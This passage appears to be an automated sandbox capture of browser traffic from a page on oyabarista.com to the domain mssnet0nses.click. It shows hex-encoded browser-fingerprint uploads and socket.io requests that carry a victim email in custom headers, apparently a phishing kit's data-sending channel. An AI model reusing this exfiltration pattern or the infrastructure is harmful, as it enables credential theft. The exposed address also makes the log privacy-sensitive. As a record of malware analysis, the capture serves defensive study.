                                                        2025-03-27 13:42:16 UTC16384OUTData Raw: 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 61 70 74 69 6f 6e 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62
                                                        Data Ascii: 7D%22%2C%22HTMLTableColElement%22%3A%22function+HTMLTableColElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCellElement%22%3A%22function+HTMLTableCellElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCaptionElement%22%3A%22function+HTMLTab
                                                        2025-03-27 13:42:16 UTC16384OUTData Raw: 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 66 72 61 6d 65 73 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 66
                                                        Data Ascii: B+%5Bnative+code%5D+%7D%22%2C%22CSSLayerBlockRule%22%3A%22function+CSSLayerBlockRule%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeywordValue%22%3A%22function+CSSKeywordValue%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeyframesRule%22%3A%22function+CSSKeyf
                                                        2025-03-27 13:42:16 UTC16384OUTData Raw: 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 57 72 69 74 61 62 6c 65 46 69 6c 65 53 74
                                                        Data Ascii: %28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemFileHandle%22%3A%22function+FileSystemFileHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemHandle%22%3A%22function+FileSystemHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemWritableFileSt
                                                        2025-03-27 13:42:16 UTC16384OUTData Raw: 32 25 32 43 25 32 32 54 61 73 6b 53 69 67 6e 61 6c 25 32 32 25 32 43 25 32 32 54 61 73 6b 50 72 69 6f 72 69 74 79 43 68 61 6e 67 65 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 54 61 73 6b 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 32 43 25 32 32 54 61 73 6b 41 74 74 72 69 62 75 74 69 6f 6e 54 69 6d 69 6e 67 25 32 32 25 32 43 25 32 32 53 79 6e 63 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 53 75 62 6d 69 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 4c 69 73 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 52 65 61 64 4f 6e 6c 79 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 25 32 32 25 32 43 25 32 32 53 74 6f 72
                                                        Data Ascii: 2%2C%22TaskSignal%22%2C%22TaskPriorityChangeEvent%22%2C%22TaskController%22%2C%22TaskAttributionTiming%22%2C%22SyncManager%22%2C%22SubmitEvent%22%2C%22StyleSheetList%22%2C%22StyleSheet%22%2C%22StylePropertyMapReadOnly%22%2C%22StylePropertyMap%22%2C%22Stor
                                                        2025-03-27 13:42:16 UTC16384OUTData Raw: 32 63 6c 6f 73 65 25 32 32 25 32 43 25 32 32 63 6f 6e 66 69 72 6d 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 25 32 32 25 32 43 25 32 32 66 65 74 63 68 25 32 32 25 32 43 25 32 32 66 69 6e 64 25 32 32 25 32 43 25 32 32 66 6f 63 75 73 25 32 32 25 32 43 25 32 32 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 25 32 32 25 32 43 25 32 32 67 65 74 53 65 6c 65 63 74 69 6f 6e 25 32 32 25 32 43 25 32 32 6d 61 74 63 68 4d 65 64 69 61 25 32 32 25 32 43 25 32 32 6d 6f 76 65 42 79 25 32 32 25 32 43 25 32 32 6d 6f 76 65 54 6f 25 32 32 25 32 43 25 32 32 6f 70 65 6e 25 32 32 25 32 43 25 32 32 70 6f 73 74 4d 65 73 73 61 67 65 25 32 32 25 32 43 25 32 32 70 72 69 6e 74 25 32 32 25 32 43 25 32 32 70 72 6f 6d 70 74 25 32 32 25 32 43 25 32 32
                                                        Data Ascii: 2close%22%2C%22confirm%22%2C%22createImageBitmap%22%2C%22fetch%22%2C%22find%22%2C%22focus%22%2C%22getComputedStyle%22%2C%22getSelection%22%2C%22matchMedia%22%2C%22moveBy%22%2C%22moveTo%22%2C%22open%22%2C%22postMessage%22%2C%22print%22%2C%22prompt%22%2C%22
                                                        2025-03-27 13:42:16 UTC15956OUTData Raw: 53 74 61 6d 70 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 74 69 6d 65 53 74 61 6d 70 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 6f 6e 74 65 78 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 6f 6e 74 65 78 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 54 61 73 6b 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 54 61 73 6b 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6d 65 6d 6f 72 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 4d 65 6d 6f 72
                                                        Data Ascii: Stamp%22%3A%22function+timeStamp%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22context%22%3A%22function+context%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createTask%22%3A%22function+createTask%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22memory%22%3A%22%5Bobject+Memor


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        133192.168.2.549890172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:16 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrizQ&sid=2YiBHHEGh1iHOHKNAAfW HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:16 UTC831INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:16 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7GSZgEejbSUHi88UdClQe%2F%2BV1T9BBLhcl6EwBLshMTGr1xYwdAasGxVAeuUdMEdgXJzIIicf1tjqtZYkolmtGSnd%2BVFWyZuQicstyr7sWNmue3C6s0Gn%2FPK31C5CEkXTZINEFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f63281e8ca2-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83782&min_rtt=83687&rtt_var=17695&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1022&delivery_rate=36482&cwnd=252&unsent_bytes=0&cid=a85852201fe9e765&ts=301&x=0"
                                                        2025-03-27 13:42:16 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
                                                        Data Ascii: 29{"code":1,"message":"Session ID unknown"}
                                                        2025-03-27 13:42:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        134192.168.2.549892172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:18 UTC567OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrjeo HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:18 UTC947INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:18 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IwbJLOI0kUesiyt4QiLUpBZLbpVARYIGg8UvOFM1QcXBGEFE7iJ%2FYrbVuL%2BTf%2FlYbYiTwqLL7BND1Yb0S%2FkiA4zYTfoPLZl4B6UphesSAqPfJVp4RoZ6rKIa89K3PK%2Ffo%2FtBjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f6baeeae351-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84284&min_rtt=84272&rtt_var=17796&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1139&delivery_rate=36255&cwnd=246&unsent_bytes=0&cid=894f589dd2f9e079&ts=305&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        135192.168.2.549893172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:18 UTC667OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrjeo HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:18 UTC843INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:18 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=27cYlCwuSU4AganjnwBNC4Amlk94zv2MpCx5FUDW7SC2tYxxwQ4JsKPerRCjzzR9pQwNbjQFzdR97ExcT326UWcKOEDi6GP5og3P7xO0BqoFKS%2BsuQc41anr4mA4yWEklRq0qg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f6e991a8c87-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83815&min_rtt=83782&rtt_var=17696&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1239&delivery_rate=36461&cwnd=252&unsent_bytes=0&cid=9851e7b62e29199f&ts=305&x=0"
                                                        2025-03-27 13:42:18 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 73 4f 74 41 36 7a 68 32 46 73 47 35 30 55 54 30 41 41 66 5a 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"sOtA6zh2FsG50UT0AAfZ","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        136192.168.2.549894172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:18 UTC593OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrjtk&sid=sOtA6zh2FsG50UT0AAfZ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:19 UTC945INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:19 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zanx%2B%2BgoybLKpY78y8kfbupFg65Zojl%2BJCBsEYgalqeG2%2FqHInY%2FO9fyC91Y9nSuOQQDN3iKIkomoZ0dBB6Zt9ZiLlXrI4i09MqA3GFe8kKzvGP4l2pwws8GjvBIY8ZQjuUobQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f719f0a41ba-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83467&min_rtt=83420&rtt_var=17670&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1165&delivery_rate=36573&cwnd=252&unsent_bytes=0&cid=adfcaa91efefa512&ts=304&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        137192.168.2.549895172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:18 UTC592OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrjtl&sid=sOtA6zh2FsG50UT0AAfZ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:19 UTC947INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:19 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cuYx99KGBEjryjbW1jmcd53jtUPeWvOdUCtu7eWNfd4DPTCKnnqPs%2BaVQbe%2F1%2FhLkSCqbzMxQURgMCF4gsDwGtQBjeDhiSexmRI%2B%2FQrFcZniQ1VGQ8J%2FfKylXt4ww431TpClqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f719e5d49aa-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84297&min_rtt=84265&rtt_var=17827&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1164&delivery_rate=36223&cwnd=252&unsent_bytes=0&cid=42188c10252b6d0d&ts=262&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        138192.168.2.549896172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:18 UTC425OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrjeo HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:19 UTC300INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:19 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: no-store
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f719dc6726e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-27 13:42:19 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 4a 51 44 69 37 57 69 53 32 70 51 62 6e 46 4f 41 41 41 66 61 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"JQDi7WiS2pQbnFOAAAfa","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        139192.168.2.549897172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:19 UTC566OUTGET /socket.io/?EIO=4&transport=websocket&sid=sOtA6zh2FsG50UT0AAfZ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://www.oyabarista.com
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: lbadGqHx4TXj+c3PC772EA==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2025-03-27 13:42:19 UTC837INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:19 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xCMs3XQ1%2F9%2Bqb7V1Aifo2hN%2FCgWzVja9j4y6hLWQCRhq4W1rhjmf%2FLdyH6ZTvP%2BtBTNge%2FdzbTWdwdxq0rg5jKkard7YG0RBqh3yQLUn5PCJshpshv8EdNXo7VEr%2FhUKH4qfXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f71fa7f42dc-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83470&min_rtt=83418&rtt_var=17621&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1121&delivery_rate=36619&cwnd=250&unsent_bytes=0&cid=fc107cf44640ef22&ts=306&x=0"
                                                        2025-03-27 13:42:19 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}
                                                        2025-03-27 13:42:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        140192.168.2.549898172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:19 UTC692OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrjtl&sid=sOtA6zh2FsG50UT0AAfZ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:20 UTC847INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:20 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GZsqWsxq12AS4lH5HRQObipSZvCg9UtckJaKS7z1MNqCqpPKVGqPxJwvFRkMcoXiNzL%2B0ZJyF1klJHto2nXTUzBWj%2Ba90tJzz3iordz%2FqnXqppdwXDS2HnKX5ipFQJlxACjU%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f745ee1aa2a-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84567&min_rtt=84420&rtt_var=17943&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1264&delivery_rate=36198&cwnd=252&unsent_bytes=0&cid=a14fab5467577764&ts=847&x=0"
                                                        2025-03-27 13:42:20 UTC1INData Raw: 31
                                                        Data Ascii: 1


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        141192.168.2.549899172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:19 UTC752OUTPOST /socket.io/?EIO=4&transport=polling&t=PNNrjtk&sid=sOtA6zh2FsG50UT0AAfZ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Content-Length: 2
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
